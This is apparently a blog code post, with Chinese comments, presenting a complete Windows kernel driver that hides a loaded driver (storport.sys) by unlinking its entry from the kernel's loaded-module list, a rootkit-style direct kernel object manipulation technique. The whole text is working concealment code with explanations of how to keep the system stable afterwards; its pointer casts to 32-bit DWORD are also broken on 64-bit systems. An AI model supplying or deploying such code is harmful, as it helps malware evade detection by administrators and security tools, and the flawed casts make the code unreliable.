隐藏驱动

 1 #include <ntddk.h>
 2 
 3 typedef unsigned long DWORD;
 4 
 5 typedef struct _KLDR_DATA_TABLE_ENTRY {
 6     LIST_ENTRY InLoadOrderLinks;
 7     PVOID ExceptionTable;
 8     ULONG ExceptionTableSize;
 9     PVOID GpValue;
10     DWORD UnKnow;
11     PVOID DllBase;
12     PVOID EntryPoint;
13     ULONG SizeOfImage;
14     UNICODE_STRING FullDllName;
15     UNICODE_STRING BaseDllName;
16     ULONG Flags;
17     USHORT LoadCount;
18     USHORT __Unused5;
19     PVOID SectionPointer;
20     ULONG CheckSum;
21     PVOID LoadedImports;
22     PVOID PatchInformation;
23 } KLDR_DATA_TABLE_ENTRY, *PKLDR_DATA_TABLE_ENTRY;
24 
25 PDRIVER_OBJECT pDriverObject = NULL;
26 
27 VOID
28 HideDriver()
29 {
30     PKLDR_DATA_TABLE_ENTRY entry = (PKLDR_DATA_TABLE_ENTRY)pDriverObject->DriverSection;
31     PKLDR_DATA_TABLE_ENTRY firstentry;
32     UNICODE_STRING uniDriverName;
33 
34     firstentry = entry;
35 
36     // 初始化要隐藏驱动的驱动名
37     RtlInitUnicodeString(&uniDriverName, L"storport.sys");
38 
39     while ((PKLDR_DATA_TABLE_ENTRY)entry->InLoadOrderLinks.Flink != firstentry)
40     {
41         if (entry->FullDllName.Buffer != 0)
42         {
43             if (RtlCompareUnicodeString(&uniDriverName, &(entry->BaseDllName), FALSE) == 0)
44             {
45                 KdPrint(("隐藏驱动 %ws 成功!\n", entry->BaseDllName.Buffer));
46                 // 修改 Flink 和 Blink 指针, 以跳过我们要隐藏的驱动
47                 *((DWORD*)entry->InLoadOrderLinks.Blink) = (DWORD)entry->InLoadOrderLinks.Flink;
48                 entry->InLoadOrderLinks.Flink->Blink = entry->InLoadOrderLinks.Blink;
49 
50                 /*
51                 使被隐藏驱动LIST_ENTRY结构体的Flink, Blink域指向自己
52                 因为此节点本来在链表中, 那么它邻接的节点驱动被卸载时,
53                 系统会把此节点的Flink, Blink域指向它相邻节点的下一个节点.
54                 但是, 它此时已经脱离链表了, 如果现在它原本相邻的节点驱动被
55                 卸载了, 那么此节点的Flink, Blink域将有可能指向无用的地址, 而
56                 造成随机性的BSoD.
57                 */
58                 entry->InLoadOrderLinks.Flink = (LIST_ENTRY*)&(entry->InLoadOrderLinks.Flink);
59                 entry->InLoadOrderLinks.Blink = (LIST_ENTRY*)&(entry->InLoadOrderLinks.Flink);
60 
61                 break;
62             }
63         }
64         // 链表往前走
65         entry = (PKLDR_DATA_TABLE_ENTRY)entry->InLoadOrderLinks.Flink;
66     }
67 }
68 
69 NTSTATUS
70 UnloadDriver(
71     IN PDRIVER_OBJECT DriverObject
72 )
73 {
74     return STATUS_SUCCESS;
75 }
76 
77 NTSTATUS
78 DriverEntry(
79     IN PDRIVER_OBJECT DriverObject,
80     IN PUNICODE_STRING  RegistryPath
81 )
82 {
83     DriverObject->DriverUnload = UnloadDriver;
84     pDriverObject = DriverObject;
85     HideDriver();
86     return STATUS_SUCCESS;
87 }

 

来源：https://www.cnblogs.com/yifi/p/6474364.html